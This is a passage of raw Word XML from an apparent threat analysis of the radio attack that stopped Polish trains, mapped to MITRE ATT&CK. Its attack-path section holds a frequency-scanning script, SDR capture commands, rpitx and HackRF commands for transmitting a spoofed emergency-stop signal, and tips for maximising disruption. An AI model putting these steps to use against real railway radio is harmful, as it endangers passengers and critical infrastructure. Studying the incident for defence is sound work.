          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Supply Chain</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Just-in-time logistics collapse </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref56">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[56]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000161">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Emergency Services</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Fuel shortages impair response </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref57">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[57]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000162">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yjyhc1em4kfp" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extended Crisis (24+ hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000163">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Economic Impact</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: $48 billion daily losses </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref58">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[58]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000164">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Public Order</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Panic buying and civil unrest </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref59">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[59]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000165">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Health Crisis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Hospital supply chains fail </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref60">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[60]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000166">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">National Security</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Military logistics compromised </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref61">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[61]</w:t>
        </w:r>
      </w:hyperlink>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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4gfqrw1w675m" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Attack Path Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i3xkenvm8zfq" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1: Target Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T1595.002 - Active Scanning </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref62">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[62]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sze9o4y3c065" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Frequency Discovery Process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/usr/bin/env python3</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Railroad frequency scanner used in Poland</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Educational reconstruction only</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import subprocess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import numpy as np</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Common railroad frequencies (MHz)</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rail_frequencies =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151.475, 151.480, 151.485,  # European</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160.215, 160.830, 161.100,  # US freight</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160.245, 160.320, 160.920   # US passenger</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def scan_frequency(freq):</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"""Scan for radio activity"""</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cmd = f"rtl_power -f {freq}M:2M:25k -i 1"</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result = subprocess.run(cmd, shell=True, capture_output=True)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return analyze_power(result.stdout)</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def analyze_power(data):</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"""Identify active channels"""</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power_levels = np.fromstring(data, sep=',')</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active = power_levels &gt; -60  # dBm threshold</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return active.any()</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Attackers found 151.48 MHz active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for freq in rail_frequencies:</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if scan_frequency(freq):</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print(f"Active: {freq} MHz")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_l1ja8gbhiyx" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2: Signal Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T1040 - Network Sniffing </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref63">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[63]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dy8vwknva987" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Identification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Actual signal capture and analysis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Source: Polish investigation files [[64]](#ref64)</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Capture 10 seconds of radio</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rtl_sdr -f 151.48M -s 240000 -n 2400000 rail_capture.iq</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Demodulate FM signal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rtl_fm -f 151.48M -M fm -s 24k -r 24k - |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sox -t raw -r 24k -e signed -b 16 - emergency_stop.wav</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Analyze audio pattern</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sox emergency_stop.wav -n spectrogram</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Result: 3-second tone pattern identified</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1sgh6w5skwq5" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3: Attack Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0863 - Spoof Reporting Message </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref65">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[65]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bzyqqahhyp2u" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Transmission Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Warning: Illegal to execute against live systems</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Poland attackers used this approach</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Generate emergency stop signal</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sox -n -r 48000 stop_signal.wav synth 3 sine 1000 sine 2000</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Transmit on rail frequency</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Using Raspberry Pi with rpitx (Poland method)</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sudo rpitx -m FM -f 151480 stop_signal.wav</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Alternative: HackRF/USRP for longer range</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hackrf_transfer -t stop_signal.iq -f 151480000 -s 2000000 -a 1 -x 40</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9tor6tx2hq6w" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4: Effect Amplification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0835 - Manipulate I/O </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref66">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[66]</w:t>
        </w:r>
      </w:hyperlink>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The attackers maximized impact through:</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Timing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Late night/early morning for maximum confusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Geography</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Multiple regions simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistence</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Repeated transmissions over 30 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Psychology</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Emergency stop triggers cascade of manual stops</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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sducu8cbfjre" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_k0jquvvlou1" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive TTP Matrix</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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tactic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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sub-Technique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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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Reconnaissance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T1595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RF spectrum scanning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SDR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hyperlink w:anchor="ref67">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[67]</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Resource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T1587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SDR tool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Code repositories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hyperlink w:anchor="ref68">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[68]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Initial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T0863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Spoof radio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Signal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hyperlink w:anchor="ref69">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[69]</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T0835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Manipulate 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Behavioral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hyperlink w:anchor="ref70">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[70]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Not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hyperlink w:anchor="ref71">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[71]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Defense Evasion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T0858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Use legitimate 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Protocol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hyperlink w:anchor="ref72">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[72]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T0840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Network scan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Spectrum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hyperlink w:anchor="ref73">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[73]</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T0861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Signal intelligence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RF fingerprinting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hyperlink w:anchor="ref74">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[74]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Command &amp;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 xml:space="preserve">T0869</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Standard protocol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Anomaly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hyperlink w:anchor="ref75">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[75]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T0833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Stop train movement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t xml:space="preserve">Service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hyperlink w:anchor="ref76">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[76]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
